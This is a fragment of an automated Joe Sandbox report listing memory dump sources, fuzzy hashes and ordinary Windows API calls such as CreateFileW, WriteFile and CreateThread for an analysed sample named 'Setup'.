Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindResourceW.KERNEL32(?,?,00000006,69912F8C,00000000,?,698EF018,00000000,?,00000000,?,?,?,?,?,698EE923), ref: 698EF03D
  • Part of subcall function 698F7A10: LoadResource.KERNEL32(?,?,?,?,698EF053,?,00000000,?,698EF018,00000000,?,00000000,?,?), ref: 698F7A1E
  • Part of subcall function 698F7A10: LockResource.KERNEL32(00000000,69912F8C,?,698EF053,?,00000000,?,698EF018,00000000,?,00000000,?,?), ref: 698F7A2A
  • Part of subcall function 698F7A10: SizeofResource.KERNEL32(?,?,?,698EF053,?,00000000,?,698EF018,00000000,?,00000000,?,?), ref: 698F7A3C
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2001391462-0
                                                                                                                                                                    • Opcode ID: dce7c39d2ff0061ceda5af0b66fd4e8d844d89869e6921c3fbab43541d675196
                                                                                                                                                                    • Instruction ID: f90409139c9c88c5f524b5b2312ddeab8b0abd054082aed7e0042b48db16903c
                                                                                                                                                                    • Opcode Fuzzy Hash: dce7c39d2ff0061ceda5af0b66fd4e8d844d89869e6921c3fbab43541d675196
                                                                                                                                                                    • Instruction Fuzzy Hash: 62012C79600604AFCB10DF99C884C9AB7B8FF49394B10996AF916CB311D770ED05CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2001391462-0
                                                                                                                                                                    • Opcode ID: 418c8faa8bb17f4116f65aeaec1898627a1780b09b30d3fe84bd4296820e32b2
                                                                                                                                                                    • Instruction ID: 5635ecfbb789c2fc7b0b5c33c4641978dcef230d040f630d57af148edcc9fd6e
                                                                                                                                                                    • Opcode Fuzzy Hash: 418c8faa8bb17f4116f65aeaec1898627a1780b09b30d3fe84bd4296820e32b2
                                                                                                                                                                    • Instruction Fuzzy Hash: BE01047A601208EFC710DFA9C884C9AB7ADFF89354711896AF9158B311DB70ED04CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 96200778a3a4324755910e566521faf288bb7afcf5d35f34ee5256ed8914409a
                                                                                                                                                                    • Instruction ID: 8d530d86f7e9458ee94b0e7a363b08582cabec7e3c537f02a66cf09a8019ed32
                                                                                                                                                                    • Opcode Fuzzy Hash: 96200778a3a4324755910e566521faf288bb7afcf5d35f34ee5256ed8914409a
                                                                                                                                                                    • Instruction Fuzzy Hash: EF110534A00209EBDB18DFA8C854A9EB765BF45724B108568F825DF7D0CB36EE01CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_catch
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3886170330-0
                                                                                                                                                                    • Opcode ID: c551533d782063fef5c1fe4b68a964f2932925b5213966c538f611ab616555d1
                                                                                                                                                                    • Instruction ID: 60d9279eaa46433e1a379f2a0e18b2999df94e586376b23bdee59544e07478cd
                                                                                                                                                                    • Opcode Fuzzy Hash: c551533d782063fef5c1fe4b68a964f2932925b5213966c538f611ab616555d1
                                                                                                                                                                    • Instruction Fuzzy Hash: B2F04974A10305EBDB14DFA8C904B4D3BA5BF4A360F10C1A8B858DF790CB72DA01CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00002100,00000002,00000000,698F7BC3,C0000000,?,00000000,?,?,698F7BC3,?,C0000000,00000000,00000002,00002100,?), ref: 698F7F5C
  • Part of subcall function 698F7E95: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,698F7F46,00002100,00000002,00000000,698F7BC3,C0000000,?,?,?,698F7BC3,?,C0000000,00000000), ref: 698F7EA6
  • Part of subcall function 698F7E95: GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 698F7EB6
APIs
• CreateFileW.KERNEL32(?,?,?,?,00000000,?,00000000,00000001,?,69D7A9FA,?,80000000,00000001,00000003,00000080,00000000), ref: 69D780D7
  • Part of subcall function 69DC89E2: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,69D780C1,?,?,?,?,00000000,?,00000001,?,69D7A9FA,?,80000000,00000001), ref: 69DC89F3
  • Part of subcall function 69DC89E2: GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 69DC8A03
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 3ee51dd97339dbd4e1554b41367bdbf5544deb5955dfb5624cd5784d7958a8e8
• Instruction ID: ad2b94ecbd8298d4584cdac9f7eda93c8b632259b2f386dbb07ef787902826c5
• Opcode Fuzzy Hash: 3ee51dd97339dbd4e1554b41367bdbf5544deb5955dfb5624cd5784d7958a8e8
• Instruction Fuzzy Hash: FEF0BE3A9441899ECF01CBB4C9007ECBB656F2231DF40E070D4607BAA0C779A62A97A1
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D77C75
  • Part of subcall function 69D77CE8: __EH_prolog3.LIBCMT ref: 69D77CEF
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 62a85f7790cd3eae4ff375e3f11791a5bbf1b88d9b93297726169f69551299a3
• Instruction ID: a821ffac54787859128508ae4f5a204333fa2fb65905f24d2f816e25661bcc53
• Opcode Fuzzy Hash: 62a85f7790cd3eae4ff375e3f11791a5bbf1b88d9b93297726169f69551299a3
• Instruction Fuzzy Hash: CDF01DB4740A02AAD748DF3885403ADF6A5BF58308F40963D902DE7741CB316815CBD4
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,0000044A,00000002,?), ref: 698E0F06
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: dd96207b4b9e11bbf3edfea9dcd46d9fbb04db2bc096648e068fd450d496966b
• Instruction ID: f39396545d0c9445a31bd62c955530a8dbe52a5540ba3888d8d079251b6cbc4a
• Opcode Fuzzy Hash: dd96207b4b9e11bbf3edfea9dcd46d9fbb04db2bc096648e068fd450d496966b
• Instruction Fuzzy Hash: F0F039B690020CBBDB00CFD8C806BDEFBF8BB59300F50846AE611B7250D7709608CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DA8C81
  • Part of subcall function 69DAFFA8: _memcpy_s.LIBCMT ref: 69DAFFCE
  • Part of subcall function 69DAFFA8: _memcpy_s.LIBCMT ref: 69DAFFDE
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: _memcpy_s$H_prolog3
• String ID:
• API String ID: 1888667434-0
• Opcode ID: 1f5832d9245c8696f673b72774b56ead4060431a3e3e89b708c3d7047e57f6f4
• Instruction ID: 8b9cd095b2d1afaad77dee2129d8195df0bf69a4924913dc26028c3cca42e0f6
• Opcode Fuzzy Hash: 1f5832d9245c8696f673b72774b56ead4060431a3e3e89b708c3d7047e57f6f4
• Instruction Fuzzy Hash: 9BF03079A00208EBCF00DFA9C98098DFB74BF48718F44D479E9186B700C7759A18DBE1
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698DB945
  • Part of subcall function 698F830D: _vwprintf.LIBCMT ref: 698F8353
  • Part of subcall function 698F830D: _vswprintf_s.LIBCMT ref: 698F8378
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3_vswprintf_s_vwprintf
• String ID:
• API String ID: 3682816334-0
• Opcode ID: ec4f7e60c09f365cb7b1084d15b50fbc853396e793c7287d4e51ac514c64abdc
• Instruction ID: be28b853cc6de84ba2646fcdad554e648aeb600b8d8225dbc7251afcf568f8b0
• Opcode Fuzzy Hash: ec4f7e60c09f365cb7b1084d15b50fbc853396e793c7287d4e51ac514c64abdc
• Instruction Fuzzy Hash: 6CF01C7450014ADFCF00DFA4C854AADBBB9BF5431CF41981DE5259B251DB31DA16CB51
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,00000006,?,?,?,?,698DDAC1,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 698F7E76
                                                                                                                                                                      • Part of subcall function 698F7F08: GetLastError.KERNEL32(698F7B0B,?,?,?,00000000), ref: 698F7F08
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                    • Opcode ID: 25c8783f4bf4f8c4f8726bf5409ddcc6f8f4a9545601444be9db8d4f92e27abf
                                                                                                                                                                    • Instruction ID: ec8764d0fa5890125f024f6648c2f2f7751480712ad5539f3573420ac10c9505
                                                                                                                                                                    • Opcode Fuzzy Hash: 25c8783f4bf4f8c4f8726bf5409ddcc6f8f4a9545601444be9db8d4f92e27abf
                                                                                                                                                                    • Instruction Fuzzy Hash: 7BE09271600148BFAB04CFA4C840C8E3BB8EF05350B10465DF915C3290D730DD10DB60
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog3.LIBCMT ref: 69D739B4
  • Part of subcall function 69DC8DCD: _vwprintf.LIBCMT ref: 69DC8E13
  • Part of subcall function 69DC8DCD: _vswprintf_s.LIBCMT ref: 69DC8E38
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3_vswprintf_s_vwprintf
• String ID:
• API String ID: 3682816334-0
Uniqueness
Uniqueness Score: -1.00%
APIs
• SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,69D7AA3A,?,00000000,00000000,00000002,?,80000000,00000001,00000003), ref: 69D78149
  • Part of subcall function 69DC89C8: GetLastError.KERNEL32(69D780E8,69D7A9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 69DC89C8
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog3.LIBCMT ref: 69D73965
  • Part of subcall function 69DA8C24: __EH_prolog3.LIBCMT ref: 69DA8C2B
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog3.LIBCMT ref: 69D73924
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
Uniqueness
Uniqueness Score: -1.00%
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,?,69DA60F1), ref: 69D7810D
  • Part of subcall function 69DC89C8: GetLastError.KERNEL32(69D780E8,69D7A9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 69DC89C8
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
Uniqueness
Uniqueness Score: -1.00%
APIs
• __EH_prolog3.LIBCMT ref: 69DA8387
  • Part of subcall function 69DA84FF: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,69DAFA6E,02602230,?,?,69DA83B3,02602230,69D6A794,02602230,69D6A794,00000000), ref: 69DA851E
  • Part of subcall function 69DA84FF: MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,69DAFA6E,02602230,?,?,69DA83B3,02602230,69D6A794,02602230,69D6A794), ref: 69DA853F
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: ByteCharMultiWide$H_prolog3
• String ID:
                                                                                                                                                                    • API String ID: 692526729-0
                                                                                                                                                                    • Opcode ID: 519331152f1a04b9636ffdb79f897746b0c1c7df4bfe1be79a2a8d7307282852
                                                                                                                                                                    • Instruction ID: bc1964d1be046d91581394ab512d76ed57cc797e64a1a54219dc5976d76be10a
                                                                                                                                                                    • Opcode Fuzzy Hash: 519331152f1a04b9636ffdb79f897746b0c1c7df4bfe1be79a2a8d7307282852
                                                                                                                                                                    • Instruction Fuzzy Hash: D3E0C238100220A3DB01EF64CA01B8E37165F1061CF00E070EC406FA00CB354B2967F6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 36ce4532cf3b49d4c8c25d121bd4c82839e640cb0b471fb8abce13cc0844ae93
• Instruction ID: 578f1255985c8740e34cd05f963e7482a71a95ee4b1ac1f0150b91ebe5f42ef7
• Opcode Fuzzy Hash: 36ce4532cf3b49d4c8c25d121bd4c82839e640cb0b471fb8abce13cc0844ae93
• Instruction Fuzzy Hash: 24E0C739100210A3DF02EB648A01B8E372A6F1076CF00E030E8406FA00CB358A2AABF6
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateThread.KERNEL32(00000000,00000000,69DC23E8,?,00000000,00000000), ref: 69DBD729
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
